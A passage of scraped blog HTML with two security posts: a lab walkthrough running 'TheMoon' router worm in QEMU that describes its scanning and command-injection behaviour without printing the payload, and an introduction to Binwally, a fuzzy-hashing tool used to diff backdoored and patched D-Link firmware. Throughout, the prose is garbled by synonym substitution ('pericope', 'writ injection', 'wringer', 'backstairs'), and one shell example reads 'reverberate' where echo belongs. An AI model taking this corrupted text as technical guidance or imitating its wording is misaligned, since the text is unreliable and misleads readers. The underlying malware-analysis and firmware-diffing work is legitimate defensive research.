href="http://4.bp.blogspot.com/-cblY7uhQbhE/UwBmYj8okFI/AAAAAAAAAPI/2aIWtLsA4YU/s1600/Screenshot+from+2014-02-16+04%5E%2518%5E%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-cblY7uhQbhE/UwBmYj8okFI/AAAAAAAAAPI/2aIWtLsA4YU/s1600/Screenshot+from+2014-02-16+04%5E%2518%5E%2529.png" height="372" width="640" /></a></div><br /></div><div><b>Debian MIPS Linux</b></div><div><br />I won't describe how to set up your Debian MIPS Linux considering <a href="https://twitter.com/zcutlip">Zach Cutlip</a> once did an wondrous job describing it on <a href="http://shadow-file.blogspot.com.br/2013/05/running-debian-mips-linux-in-qemu.html">this blog post</a>. The process is quite similar to the OpenWRT one and if you're too lazy to build your own environment,&nbsp;<a href="http://www.aurel32.net/">Aurelien</a>&nbsp;provides pre-compiled binaries <a href="http://people.debian.org/~aurel32/qemu/mipsel/">here</a>. Don't forget to set you network connections properly<br /><br /><b>Dynamic Analysis</b><br /><br />In order to emulate the Linksys Environment, let's download and unpack the Firmware from E2500v2 (v1.0.07).<br /><br /><script src="https://gist.github.com/bmaia/9042835.js"></script>Let's reprinting and pericope the root filesystem (e2500.tar.gz) and the malicious binary (EXr.pdf) to our test machine (Debian MIPS). Remember to reprinting the worm to the towardly "/tmp" folder. Backup your QEMU image, start sniffing the connections from the bridged network (tap1 on my case) and tighten the necessary pseudo-devices to the chrooted path. You can run the binary directly on your Debian MIPS environment, but using chroot and the target filesystem is highly recommended. If you try to chroot and run the worm without linking these devices, it will refuse to run and it won't waif the second stage binary.<br /><br /><script src="https://gist.github.com/bmaia/9042842.js"></script>You can use strace to log the syscalls and start your chrooted shell to run the malicious binary. I had some issues using strace on the 2.6.32 Debian MIPS Kernel (vmlinux-2.6.32-5-4kc-malta). The 3.2.0 &nbsp;(vmlinux-3.2.0-4-4kc-malta) version seems to be running fine.<br /><br /></div><div><script src="https://gist.github.com/bmaia/9042862.js"></script> <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-kQ3zSimmtZU/UwEu2dtMe0I/AAAAAAAAAPY/-LAqMUlbutc/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-kQ3zSimmtZU/UwEu2dtMe0I/AAAAAAAAAPY/-LAqMUlbutc/s1600/Screenshot-Terminal.png" height="442" width="640" /></a></div><br />If you don't want to use strace, simply start sh chrooted and run the malware:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-nOMfJM9WfQ4/UwFUzcu1DNI/AAAAAAAAAR4/OY1rCD5H8WU/s1600/Screenshot-Terminal-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-nOMfJM9WfQ4/UwFUzcu1DNI/AAAAAAAAAR4/OY1rCD5H8WU/s1600/Screenshot-Terminal-7.png" height="442" width="640" /></a></div><br />The worm tries to remove files containing unrepealable extensions and perform a series of system checks.Withouta few seconds the binary is removed from /tmp/ and three files are written on the disk: .L26 (PID), .L26.lunar (LunarWiringURL) and .L26.out (Debug log).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-mRKseoGIyDg/UwEvWEg-ROI/AAAAAAAAAPg/UjWvaUdojd8/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-mRKseoGIyDg/UwEvWEg-ROI/AAAAAAAAAPg/UjWvaUdojd8/s1600/Screenshot-Terminal-5.png" height="416" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><script src="https://gist.github.com/bmaia/9042570.js"></script> It's possible to dump QEMU's physical memory using the <a href="http://doc.opensuse.org/products/draft/SLES/SLES-kvm_sd_draft/cha.qemu.monitor.html"><span id="goog_1832131169"></span>pmemsave</a>&nbsp;command by hitting CTRL+A, C (to enter QEMU's legalistic interface) and entering:<br /><br /><script src="https://gist.github.com/bmaia/9042866.js"></script> <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-0HeVeodQ7NQ/UwIIXmJ7-9I/AAAAAAAAATI/VcDbNd5-niU/s1600/Screenshot-Terminal-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-0HeVeodQ7NQ/UwIIXmJ7-9I/AAAAAAAAATI/VcDbNd5-niU/s1600/Screenshot-Terminal-16.png" height="164" width="640" /></a></div><br />The 256MB raw dump will be saved on your host's local path. You can now try to use volatility or run strings versus it.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Yjseqv6GQsI/UwE34qlRD1I/AAAAAAAAAQk/aHvCQdJxfnE/s1600/Screenshot-Terminal-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-Yjseqv6GQsI/UwE34qlRD1I/AAAAAAAAAQk/aHvCQdJxfnE/s1600/Screenshot-Terminal-6.png" height="441" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-4AG5cfMVens/UwF7xSZU5-I/AAAAAAAAAS0/nhF8CqhFbTw/s1600/Screenshot-Terminal-10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-4AG5cfMVens/UwF7xSZU5-I/AAAAAAAAAS0/nhF8CqhFbTw/s1600/Screenshot-Terminal-10.png" height="441" width="640" /></a></div><br />The worm starts scanning for ports 80 and 8080 on a <a href="https://isc.sans.edu/diaryimages/moonnets">hardcoded list of networks</a>. If the /HNAP/ URL returns a string identifying the targeted routers, the malware sends a HTTP POST trying to <a href="http://www.exploit-db.com/exploits/31683/">exploit a writ injection</a> on the vulnerable CGI.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-KwpEP490tFE/UwE9N8SkvuI/AAAAAAAAARE/jRkQzqXIj0k/s1600/scanss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-KwpEP490tFE/UwE9N8SkvuI/AAAAAAAAARE/jRkQzqXIj0k/s1600/scanss.PNG" height="234" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-AziO4HsHKwA/UwE0GOfZTxI/AAAAAAAAAP0/NMUe9RTyN2k/s1600/diaida.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-AziO4HsHKwA/UwE0GOfZTxI/AAAAAAAAAP0/NMUe9RTyN2k/s1600/diaida.png" height="566" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-SPUJ75BZxHA/UwE2w0zzdNI/AAAAAAAAAQQ/mIIFbFMxkMw/s1600/w1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-SPUJ75BZxHA/UwE2w0zzdNI/AAAAAAAAAQQ/mIIFbFMxkMw/s1600/w1.PNG" height="424" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-KcadiAcdgOE/UwE2xDcqAaI/AAAAAAAAAQc/MI0Z2jGptoQ/s1600/w2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-KcadiAcdgOE/UwE2xDcqAaI/AAAAAAAAAQc/MI0Z2jGptoQ/s1600/w2.PNG" height="414" width="640" /></a></div><br />Decoded POST:<br /><br /><script src="https://gist.github.com/bmaia/9042580.js"></script> <br /><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"></div>TheMoon will moreover start an HTTPS server ("Lunar Base") on the router using the random port identified on the .L26.lunar file. The certificate'sWorldwideName, Organization and Organizational Unit are hardcoded and other values seem to be random. Trying to find these entries on&nbsp;<a href="https://scans.io/">scans.io</a>&nbsp;SSL certificates datasets would be really interesting.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-q3RaOSx-1fo/UwE5STAedeI/AAAAAAAAAQw/cGIUwHuyuVo/s1600/output_Su1S8R.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-q3RaOSx-1fo/UwE5STAedeI/AAAAAAAAAQw/cGIUwHuyuVo/s1600/output_Su1S8R.gif" height="400" width="375" /></a></div><br />The HTTPS server hosts three files: gerty.png, lunar.png and favicon.ico:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-6WGwemI3OlU/UwF1P3xz-1I/AAAAAAAAASc/yUIw1Lobrrk/s1600/Screenshot-Terminal-12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-6WGwemI3OlU/UwF1P3xz-1I/AAAAAAAAASc/yUIw1Lobrrk/s1600/Screenshot-Terminal-12.png" height="425" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-rgbn1Js8Vxg/UwF0Zowd1AI/AAAAAAAAASI/OTQRiZV3-qk/s1600/Screenshot-gerty.png+(PNG+Image,+285%C2%A0%C3%97%C2%A0196+pixels)+-+Mozilla+Firefox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-rgbn1Js8Vxg/UwF0Zowd1AI/AAAAAAAAASI/OTQRiZV3-qk/s1600/Screenshot-gerty.png+(PNG+Image,+285%C2%A0%C3%97%C2%A0196+pixels)+-+Mozilla+Firefox.png" height="465" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-wj7kCwL2DWs/UwF1P7rWbVI/AAAAAAAAASQ/DOynHHC4aCQ/s1600/Screenshot-Terminal-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-wj7kCwL2DWs/UwF1P7rWbVI/AAAAAAAAASQ/DOynHHC4aCQ/s1600/Screenshot-Terminal-11.png" height="294" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"></div>Rkhunter reports a few warnings on the infected system. I have upload the well-constructed output from rkhunter to Pastebin, get it&nbsp;<a href="http://pastebin.com/CSkh2jJ5">here</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-JSmd-4Kf_1I/UwF6R8jpAII/AAAAAAAAASo/1UnAwuxJBYM/s1600/Screenshot-Terminal-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-JSmd-4Kf_1I/UwF6R8jpAII/AAAAAAAAASo/1UnAwuxJBYM/s1600/Screenshot-Terminal-13.png" height="442" width="640" /></a></div><br />Another useful technique is to compare the contents from the filesystem with a known good template. You can use <a href="http://w00tsec.blogspot.com.br/2013/12/binwally-directory-tree-diff-tool-using.html">binwally</a>, <a href="http://winmerge.org/">WinMerge</a>&nbsp;or <a href="https://github.com/devttys0/binwalk/blob/master/src/binwalk/modules/hashmatch.py">binwalk's hashmatch</a>.<br /><br /><script src="https://gist.github.com/bmaia/9042869.js"></script> <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-eb8lFdWzL3k/UwFNy5wcUWI/AAAAAAAAARo/MMKlLjRtnaE/s1600/Screenshot+from+2014-02-16+15%255E%252544%255E%252522.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-eb8lFdWzL3k/UwFNy5wcUWI/AAAAAAAAARo/MMKlLjRtnaE/s1600/Screenshot+from+2014-02-16+15%255E%252544%255E%252522.png" height="398" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-AuyFS22fUmA/UwFNy2v6eFI/AAAAAAAAARk/qWmjS7ruduU/s1600/Screenshot+from+2014-02-16+15%5E%2544%5E%2554.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-AuyFS22fUmA/UwFNy2v6eFI/AAAAAAAAARk/qWmjS7ruduU/s1600/Screenshot+from+2014-02-16+15%5E%2544%5E%2554.png" height="398" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"></div><b>Conclusion</b><br /><div style="orphans: auto; text-align: start; text-indent: 0px; widows: auto;"><div style="margin: 0px;"><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;"><br /></div><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;"></div><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"></div><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;"></div><div style="orphans: auto; text-align: start; text-indent: 0px; widows: auto;"><div style="orphans: auto; text-align: start; text-indent: 0px; widows: auto;"><div style="margin: 0px;"><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">I did not spend much time reversing the files and its functions as the main purpose of this post was to provide information to identify and execute embedded binaries, describing how to set your own virtual lab using QEMU.</div><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;"><br /></div><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">It's still possible to modernize the wringer by <a href="https://github.com/zcutlip/nvram-faker">faking the nvram</a>, by <a href="http://wiki.qemu.org/Documentation/Debugging">running a GDB server with QEMU</a>&nbsp;or using <a href="https://code.google.com/p/volatility/issues/detail?id=436">Volatility with the proper profile and debugging structures</a>, but this post is once way too long. You should moreover have a squint on <a href="http://www.s3.eurecom.fr/tools/avatar/">Avatar</a>, from <a href="http://www.eurecom.fr/rs/system_security_group">EURECOM</a>.&nbsp;Avatar's goal is to enable ramified dynamic wringer of embedded firmware in order to squire in a wide range of security-related activities, including malware analysis, reverse engineering and vulnerability discovery.</div><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;"><br /></div><div style="margin: 0px;"><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;">Let's alimony drawing public sensation on the security issues of the Internet of Threats, persuading manufactures, ISP's and final users to interreact to write these problems.</div><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;"><br /></div><br /><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;"><br /></div></div></div></div></div></div></div></div>Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com11tag:blogger.com,1999:blog-3296471108082693838.post-78173567823852060732013-12-03T10:53:00.000-02:002013-12-10T17:36:29.083-02:00Binwally: Directory tree unequal tool using Fuzzy HashingFor this post, I'll discuss well-nigh the concept of directory tree and binary diffing and how it could be used to find potential vulnerabilities and security issues that were (silently) patched on firmware images.<br /><br />Silent patching is a big deal as we don't have many security researchers like&nbsp;<a href="http://www.h2hc.org.br/h2hc/en/palestrantes#Speaker1">Spender</a>&nbsp;around. This is a worldwide practice among companies that create software and firmwares for embedded devices. Changelogs from new firmwares often contains few information well-nigh security issues, outlining the changes as "bugfixes" or "enhancements": we get no CVE's and we don't know how hair-trigger the flaws are.<br /><br />In wing to that, you may occasionally find some reference for the string <a href="http://www.aldeid.com/wiki/Exploits/proftpd-1.3.3c-backdoor">'Ac1db1tch3z' on your code</a>&nbsp;(which ways that you got a self-ruling vulnerability assessment) or your employee&nbsp;<a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">Joel might forget to remove a backstairs from the firmware</a>. Diffing the content from previous firmwares may be useful to find out when these backdoors were first installed, modified and/or removed.<br /><br />I introduce you to Binwally: a simple script to perform directory tree diffing using the concept of Fuzzy Hashing (<a href="http://ssdeep.sourceforge.net/">ssdeep</a>) to pinpoint a matching score between binaries.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-Ri52aNEsE5w/Upv4DEVTCkI/AAAAAAAAAJ0/U2AZWVEJljA/s1600/binwally.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="230" src="http://2.bp.blogspot.com/-Ri52aNEsE5w/Upv4DEVTCkI/AAAAAAAAAJ0/U2AZWVEJljA/s320/binwally.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Binwally says "no" to Silent Patching</td></tr></tbody></table><br /><b>Fuzzy Hashing</b><br /><br />Fuzzy Hashing, moreover know as context triggered piecewise hashes (CTPH), can match inputs that have homologies. Such inputs have sequences of identical bytes in the same order, although bytes in between these sequences may be variegated in both content and length. The concept was introduced by <a href="https://github.com/tridge">Andrew Tridgell</a>&nbsp;and the most well-known tool is&nbsp;<a href="http://ssdeep.sourceforge.net/">ssdeep</a>, created by <a href="https://twitter.com/jessekornblum">Jesse Kornblum</a>.<br /><br />The usage example outlined on <a href="http://ssdeep.sourceforge.net/usage.html">ssdeep's homepage</a> summarizes it well:<br /><div class="code">$ ls -l foo.txt<br />-rw-r--r-- &nbsp; 1 jessekor &nbsp;jessekor &nbsp;240 Oct 25 08:01 foo.txt</div><div class="code">$ cp foo.txt bar.txt<br />$ reverberate 1 &gt;&gt; bar.txt</div><br />A cryptographic hashing algorithm like MD5 can't be used to match these files; they have wildly variegated hashes.<br /><div class="code">$ md5deep foo.txt bar.txt<br />7b3e9e08ecc391f2da684dd784c5af7c &nbsp;/Users/jessekornblum/foo.txt<br />32436c952f0f4c53bea1dc955a081de4 &nbsp;/Users/jessekornblum/bar.txt</div><br />But fuzzy hashing can! We compute the fuzzy hash of one file and use the matching mode to match the other one.<br /><div class="code">$ ssdeep -b foo.txt &gt; hashes.txt<br />$ ssdeep -bm hashes.txt bar.txt<br />bar.txt matches foo.txt (64)</div><br />The number at the end of the line is a match score, or a weighted measure of how similar these files are. The higher the number, the increasingly similar the files.<br /><div><br /></div><b>Binwally</b><br /><br />Binwally is a simple Python script that uses this concept to unequal directory trees in order to find different, unique and matching files, displaying an overall score of the results. It was based on diffall.py from the typesetting <a href="http://www.amazon.com/Programming-Python-Mark-Lutz/dp/0596158106/">Programming Python (4th Edition)</a>&nbsp;and it requires&nbsp;<a href="https://github.com/DinoTools/python-ssdeep">python-ssdeep</a>, a wrapper for <a href="http://ssdeep.sourceforge.net/">ssdeep</a> (which is coded in C). You can download the script from my Github, pursuit the link below:<br /><br /><ul><li><a href="https://github.com/bmaia/binwally">Download Binwally</a></li></ul><br />The lawmaking is pretty straightforward, it takes two dirs/files as arguments and displays which files are unique, the ones that matches and the ones that differs and their match score. It still needs some resurgence (the matching score is based on the number of files and don't consider the filesizes for example) but it works fine for what it purposes to accomplish.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/--QD8iIwA-C4/UpzvIGUF7JI/AAAAAAAAAKQ/Hyjv1lMolYs/s1600/bin1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="http://1.bp.blogspot.com/--QD8iIwA-C4/UpzvIGUF7JI/AAAAAAAAAKQ/Hyjv1lMolYs/s400/bin1.png" width="400" /></a></div><br />Comparing two directory trees from a firmware unsquased using Binwalk and firmware-mod-kit:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-zhz-masG9Ic/UpzvIDKP58I/AAAAAAAAAKU/ApZfSNX8MXU/s1600/bin2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="http://3.bp.blogspot.com/-zhz-masG9Ic/UpzvIDKP58I/AAAAAAAAAKU/ApZfSNX8MXU/s640/bin2.png" width="640" /></a></div><br />You can once unzip this using <a href="http://winmerge.org/">Winmerge</a>, but the tool does not exhibit a matching score, it's not writ line based and not scriptable. You can trammels my <a href="http://w00tsec.blogspot.com/2013/08/simet-box-firmware-analysis-embedded.html">previous post</a> describing how to use it to differ firmware images.<br /><br />Binwally is weightier used with <a href="https://github.com/devttys0/binwalk/">Binwalk</a>, that's why I'll talk to&nbsp;<a href="https://twitter.com/devttys0">devttys0</a> to merge it with his tool (maybe a new writ line switch under the Binary Diffing options). Binwalk once supports binary diffing (-H switch), but it will just compare files and firmware images. The problem is that firmware images are usually packed, encrypted and/or compressed. When you unpack and compare the extracted files and their directory tree, you have much increasingly valuable information. If you disassemble the lawmaking and compare the results again, you get plane largest data - this is what <a href="http://www.zynamics.com/bindiff.html">bindiff</a>&nbsp;from Zynamics/Google does pretty well. The Insinuator blog has a nice <a href="http://www.insinuator.net/2013/07/reverse-engineering-tools/">example on how to use bindiff for RE</a>.<br /><br /><b>Binwally Usage: Dissecting DLinkBackstairsPatch</b><br /><br />So you may have heard recently that some DLink routers <a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">had a backdoor</a> and that a <a href="http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10001">security update</a> was issued to write the vulnerability.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-5BHqkjoe934/Upzq0ZWvojI/AAAAAAAAAKE/tAbARywAHL4/s1600/dlink1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/-5BHqkjoe934/Upzq0ZWvojI/AAAAAAAAAKE/tAbARywAHL4/s320/dlink1.png" width="319" /></a></div>According to <a href="https://www.schneier.com/">Bruce Schneier</a>, we should "Trust but verify": that's what we are going to do here. First let's download the <a href="ftp://ftp.dlink.eu/Products/dir/dir-100/driver_software/DIR-100_fw_reva_113_ALL_en_20110915.zip">backdoored version (v1.13)</a> and the <a href="ftp://ftp.dlink.eu/Products/dir/dir-100/driver_software/DIR-100_fw_revA1_114wwb02_all_en_20131112.zip">patched version (1.14)</a> from DLink's FTP. Next step is to pericope the firmware images (binwalk -e&nbsp;DIR100A1_FW114WWB02.bix&nbsp;DIR100_v5.0.0EUb3_patch02.bix) and compare the directory trees using Binwally:<br /><br /><div class="code">$ python binwally.py _DIR100_v5.0.0EUb3_patch02.bix.extracted/ _DIR100A1_FW114WWB02.bix.extracted/ </div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-PP2Ye6FTpcM/Upz2N0uAP2I/AAAAAAAAAKk/y1ly5feX3qk/s1600/bin3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://1.bp.blogspot.com/-PP2Ye6FTpcM/Upz2N0uAP2I/AAAAAAAAAKk/y1ly5feX3qk/s640/bin3.png" width="594" /></a></div><br />I removed the matching files and symlinks for largest reading, but the wringer is now narrowed to a small set of files.Equalto the release notes, a minor PPoE dial up issue was moreover fixed, that may be the reason why "/bin/pppd" had differences.<br /><br />Some files like the "/www/Home/bsc_lan.htm" have a matching score of 100 plane though they have variegated content and MD5, for example. This is due to the nature of Fuzzy Hashing, as the small modification was not unbearable to transpiration the fuzzy hash value. It's important to note that files with a "match" result do unquestionably have the same content and moreover have a matching score of 100.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-e8MIRPZqZcc/Up0YYvMMmpI/AAAAAAAAAMc/Lepa21gT51Y/s1600/wingerge1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://4.bp.blogspot.com/-e8MIRPZqZcc/Up0YYvMMmpI/AAAAAAAAAMc/Lepa21gT51Y/s640/wingerge1.png" width="640" /></a></div><br />There's a new Shell script&nbsp;on the patched 1.14 firmware, located at "/etc/wdhttp.sh". It seems that Joel "do not know how to write sash loop writ ugly code":<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-f6BtyU1iIrw/Up0FZOhy4pI/AAAAAAAAALU/uSiLlCdklXY/s1600/wdhttp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="339" src="http://3.bp.blogspot.com/-f6BtyU1iIrw/Up0FZOhy4pI/AAAAAAAAALU/uSiLlCdklXY/s640/wdhttp.png" width="640" /></a></div><br />Busybox was flipside binary that had a variegated pattern. <a href="http://w00tsec.blogspot.com/2013/09/analyzing-and-running-binaries-from.html">Running them using QEMU</a> shows that they still have the same version (v1.0.0-pre2) and variegated compile dates (2011.09.15 and 2013.10.31).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-WVztAxv-x4w/Up0AOWoukPI/AAAAAAAAAK0/6zc8GdZJX6Y/s1600/busy1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="http://4.bp.blogspot.com/-WVztAxv-x4w/Up0AOWoukPI/AAAAAAAAAK0/6zc8GdZJX6Y/s640/busy1.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-wrllS-64sPc/Up0AOZGa1iI/AAAAAAAAALA/gjoc6Tm2twk/s1600/busy2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="http://3.bp.blogspot.com/-wrllS-64sPc/Up0AOZGa1iI/AAAAAAAAALA/gjoc6Tm2twk/s640/busy2.png" width="640" /></a></div><br />According to the wringer from devttys0, the binary "/bin/webs" had the backstairs function (if you did not read his wringer yet, <a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">read it here</a>). Binwally returned a match score of 0 considering it was unable to find similar patterns. The binaries have variegated sizes and were probably compiled using variegated toolchains, containing variegated offsets, as displayed on the unequal from Winmerge:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-hxD0xryNV90/Up0B6PyRkuI/AAAAAAAAALI/7BlTHZkVTic/s1600/winmerge.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-hxD0xryNV90/Up0B6PyRkuI/AAAAAAAAALI/7BlTHZkVTic/s640/winmerge.PNG" width="640" /></a></div><br />Binwalk from v1.3.0 beta on <a href="http://binwalk.org/3d-data-visualizations/">now displays 3D binary data visualization</a>, so let's have a squint on how they differ in a 3D plane:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-qUNz66lJ3hk/Up1aztN7g3I/AAAAAAAAAM4/FDaD4tQGrog/s1600/3d.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-qUNz66lJ3hk/Up1aztN7g3I/AAAAAAAAAM4/FDaD4tQGrog/s1600/3d.gif" /></a></div><br />This is time to use an tideway other than byte comparison and fuzzy hashing. Bindiff uses graph-theoretical tideway to compare executables by identifying identical and similar functions. We first need to unriddle both files using IDA to create the needed IDB files.Withoutinputting both files on bindiff, we notice a upper level of similarity on theUndeniabilityGraphs:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-C8GuCFg0Wxk/Up0OLJFb6eI/AAAAAAAAALk/o6ZsTKWzccY/s1600/bindiff1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="433" src="http://2.bp.blogspot.com/-C8GuCFg0Wxk/Up0OLJFb6eI/AAAAAAAAALk/o6ZsTKWzccY/s640/bindiff1.png" width="640" /></a></div><br />Let's focus on the previously backdoored function "alpha_auth_check":<br /><br /><div class="separator" style="clear: both; text-align: center;"><a 